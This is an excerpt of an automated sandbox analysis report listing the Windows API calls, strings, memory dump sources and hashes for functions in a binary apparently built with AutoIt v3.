                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 0053268C
                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005326A8
                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 005326B3
                                                                                                                                                        • Part of subcall function 005319CD: GetCursorPos.USER32(?), ref: 005319E1
                                                                                                                                                        • Part of subcall function 005319CD: ScreenToClient.USER32(00000000,?), ref: 005319FE
                                                                                                                                                        • Part of subcall function 005319CD: GetAsyncKeyState.USER32(00000001), ref: 00531A23
                                                                                                                                                        • Part of subcall function 005319CD: GetAsyncKeyState.USER32(00000002), ref: 00531A3D
                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,0053199C), ref: 005326DA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                      • Opcode ID: 1a4f2a993513d00141c78417097222d4da65a5395fc02b8a078eef0460af7809
                                                                                                                                                      • Instruction ID: 64beb548866d48ebbf9e916a900d53847bf58491182f5677465229357267ff1a
                                                                                                                                                      • Opcode Fuzzy Hash: 1a4f2a993513d00141c78417097222d4da65a5395fc02b8a078eef0460af7809
                                                                                                                                                      • Instruction Fuzzy Hash: 9EB18C71A4020A9FDB14DFA8DC59FAE7BB5FB48314F108229FA19EB290D770D940DB61
                                                                                                                                                      Function 005C8C9B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C8CB9
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C8CCD
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C8CF0
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C8D13
                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005C8D51
                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005C6551), ref: 005C8DAD
                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005C8DE6
                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005C8E29
                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005C8E60
                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 005C8E6C
                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005C8E7C
                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,005C6551), ref: 005C8E8B
                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005C8EA8
                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005C8EB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                      • String ID: .dll$.exe$.icl$Qe\
                                                                                                                                                      • API String ID: 799131459-598721527
                                                                                                                                                      • Opcode ID: 823370932fc043b098e67ad7962c195979a87329ecb49e3492b3e8979cf99482
                                                                                                                                                      • Instruction ID: cb74119eac173d77bea4d012dc1b529563980e61c1933d0b2277cf54c722f575
                                                                                                                                                      • Opcode Fuzzy Hash: 823370932fc043b098e67ad7962c195979a87329ecb49e3492b3e8979cf99482
                                                                                                                                                      • Instruction Fuzzy Hash: 3A61EB7160061ABEEB149FA4CC45FBE7BBCBB18711F10451AF916D60D0DBB4AA84DBA0
                                                                                                                                                      Function 005A47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 005A4852
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A485D
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A48B4
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A48F2
                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 005A4930
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A4978
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A49B3
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A49E1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                      • Opcode ID: 664cb27b08c8b38e8b495dde7c90691cbf143a23a6acd201e5a9e0dc5e019859
                                                                                                                                                      • Instruction ID: cf486a05806e01160f1cc280c83aff9c3e7e59480fd900bd8f406e599517478f
                                                                                                                                                      • Opcode Fuzzy Hash: 664cb27b08c8b38e8b495dde7c90691cbf143a23a6acd201e5a9e0dc5e019859
                                                                                                                                                      • Instruction Fuzzy Hash: B071BA326086069FC710EF64C88196EBBE4FFE9758F00492CF892972A1EB74DD45CB91
                                                                                                                                                      Function 005962AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 005962BD
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005962CF
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005962E6
                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 005962FB
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00596301
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00596311
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00596317
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00596338
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00596352
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0059635B
                                                                                                                                                      • _wcslen.LIBCMT ref: 005963C2
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005963FE
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00596404
                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0059640B
                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00596462
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0059646F
                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00596494
                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005964BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                      • Opcode ID: 2c306f13fffe8ff419964bf2bd38d7f574b232b2f2d785f03ec2476c57f1ecb9
                                                                                                                                                      • Instruction ID: 2c25308f1a4e3f6f73e928ff4240826cc14b440520314394ca2322c032dbad7d
                                                                                                                                                      • Opcode Fuzzy Hash: 2c306f13fffe8ff419964bf2bd38d7f574b232b2f2d785f03ec2476c57f1ecb9
                                                                                                                                                      • Instruction Fuzzy Hash: 78716C31900605AFDF20DFA8CE89EAEBBF5FF48705F104928E586A35A0D775E948DB50
                                                                                                                                                      Function 005B076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005B0784
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 005B078F
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 005B079A
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 005B07A5
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 005B07B0
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 005B07BB
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 005B07C6
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 005B07D1
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 005B07DC
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 005B07E7
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 005B07F2
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 005B07FD
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 005B0808
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 005B0813
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005B081E
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005B0829
                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 005B0839
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005B087B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                      • Opcode ID: 805696490c48344fa12cdbcc38e9293831f935ac4406e3d4f99b7c3485da11ba
                                                                                                                                                      • Instruction ID: 26f71a5a5bb1da37d4d96400c073503739f117eeed335780e8106c8c319a1cc3
                                                                                                                                                      • Opcode Fuzzy Hash: 805696490c48344fa12cdbcc38e9293831f935ac4406e3d4f99b7c3485da11ba
                                                                                                                                                      • Instruction Fuzzy Hash: 534142B0D083196ADB109FBA8C89C5EBFE8FF04754B50452AF11DE7291DA78E901CF91
                                                                                                                                                      Function 00550456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00550456
                                                                                                                                                        • Part of subcall function 0055047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0060170C,00000FA0,6BC079AF,?,?,?,?,00572753,000000FF), ref: 005504AC
                                                                                                                                                        • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00572753,000000FF), ref: 005504B7
                                                                                                                                                        • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00572753,000000FF), ref: 005504C8
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005504DE
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005504EC
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005504FA
                                                                                                                                                        • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550525
                                                                                                                                                        • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550530
                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 00550477
                                                                                                                                                        • Part of subcall function 00550433: __onexit.LIBCMT ref: 00550439
                                                                                                                                                      Strings
                                                                                                                                                      • SleepConditionVariableCS, xrefs: 005504E4
                                                                                                                                                      • WakeAllConditionVariable, xrefs: 005504F2
                                                                                                                                                      • kernel32.dll, xrefs: 005504C3
                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005504B2
                                                                                                                                                      • InitializeConditionVariable, xrefs: 005504D8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                      • Opcode ID: 56a2cc6c5ae5dd1319cbde00030b1831f1b61e85eaed020e1d2678ad7ce178ef
                                                                                                                                                      • Instruction ID: b025be827c6c7bee452317aba09a663932f501d934beb7b3484210e40901a0a5
                                                                                                                                                      • Opcode Fuzzy Hash: 56a2cc6c5ae5dd1319cbde00030b1831f1b61e85eaed020e1d2678ad7ce178ef
                                                                                                                                                      • Instruction Fuzzy Hash: 1921DA32680711AFD7216F68AC19F6A7EA5FB55B62F04212BFD05D62D0DB648C08CA61
                                                                                                                                                      Function 005A4E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,005CDCD0), ref: 005A4E81
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4E95
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4EF3
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4F4E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4F99
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A5001
                                                                                                                                                        • Part of subcall function 0054FD60: _wcslen.LIBCMT ref: 0054FD6B
                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,005F7C10,00000061), ref: 005A509D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                                                      • Opcode ID: b57048b52accb67809064cd7855b45aa7ab787bd54460b93a37d9937e23c1831
                                                                                                                                                      • Instruction ID: 17cb8010d3307742fbbd701d754df2415d750f47efe6e90ea843e37123365367
                                                                                                                                                      • Opcode Fuzzy Hash: b57048b52accb67809064cd7855b45aa7ab787bd54460b93a37d9937e23c1831
                                                                                                                                                      • Instruction Fuzzy Hash: 33B1DF316087029FC710DF28C894A7EBFE5BFE6724F10891DF59687291EB70D845CA92
                                                                                                                                                      Function 005B4946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,005CDCD0), ref: 005B4A18
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005B4A2A
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,005CDCD0), ref: 005B4A4F
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,005CDCD0), ref: 005B4A9B
                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,005CDCD0), ref: 005B4B05
                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 005B4BBF
                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005B4C25
                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005B4C4F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                      • Opcode ID: 0e61db13f2479d63778f47fbe81e606b04117e25b10d1c5c4a9c18a5245881e2
                                                                                                                                                      • Instruction ID: 4fbb3bec1852bfb037eaff76a4f35de562e816840c71e9baf0ed42316c8d79c8
                                                                                                                                                      • Opcode Fuzzy Hash: 0e61db13f2479d63778f47fbe81e606b04117e25b10d1c5c4a9c18a5245881e2
                                                                                                                                                      • Instruction Fuzzy Hash: C2120971A00115EFDB25CF94C884EAEBBB9FF85314F248098E915AB252D731ED46CFA1
                                                                                                                                                      Function 005ACDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005ACE0D
                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 005ACE20
                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 005ACE34
                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005ACE4D
                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 005ACE90
                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005ACEA6
                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005ACEB1
                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005ACEE1
                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 005ACF39
                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 005ACF4D
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 005ACF58
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                      • Opcode ID: 774973ee7e5d6149cc008e2d559839b61465536cbb65b83d3c863425e9893627
                                                                                                                                                      • Instruction ID: 6f87a416625444afc7d3f5a48da27a9b0eec2c8c56b32967f473fcb7684a6714
                                                                                                                                                      • Opcode Fuzzy Hash: 774973ee7e5d6149cc008e2d559839b61465536cbb65b83d3c863425e9893627
                                                                                                                                                      • Instruction Fuzzy Hash: 5E5158B5500609BFDB219F64CD88AAE7FFDFB19744F008429F94AD6210D734E948EBA0
                                                                                                                                                      Function 005320D8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00532102
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 259745315-1270690246
                                                                                                                                                      • Opcode ID: b7a842b0f0688ba257e768a10f0c2308086f589317c5462d7e35bf3b11d6da33
                                                                                                                                                      • Instruction ID: 440ee78268778195f47b564dc194ad3da98b754c05802b33371ff683c2f4a163
                                                                                                                                                      • Opcode Fuzzy Hash: b7a842b0f0688ba257e768a10f0c2308086f589317c5462d7e35bf3b11d6da33
                                                                                                                                                      • Instruction Fuzzy Hash: 60418F71100A40AFDB205F38DD88BBA3FB5BB56730F148655FAA6872E1C7319D46EB20
                                                                                                                                                      Function 0059C80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(00602990,000000FF,00000000,00000030), ref: 0059C888
                                                                                                                                                      • SetMenuItemInfoW.USER32(00602990,00000004,00000000,00000030), ref: 0059C8BD
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0059C8CF
                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0059C915
                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0059C932
                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 0059C95E
                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0059C9A5
                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C9EB
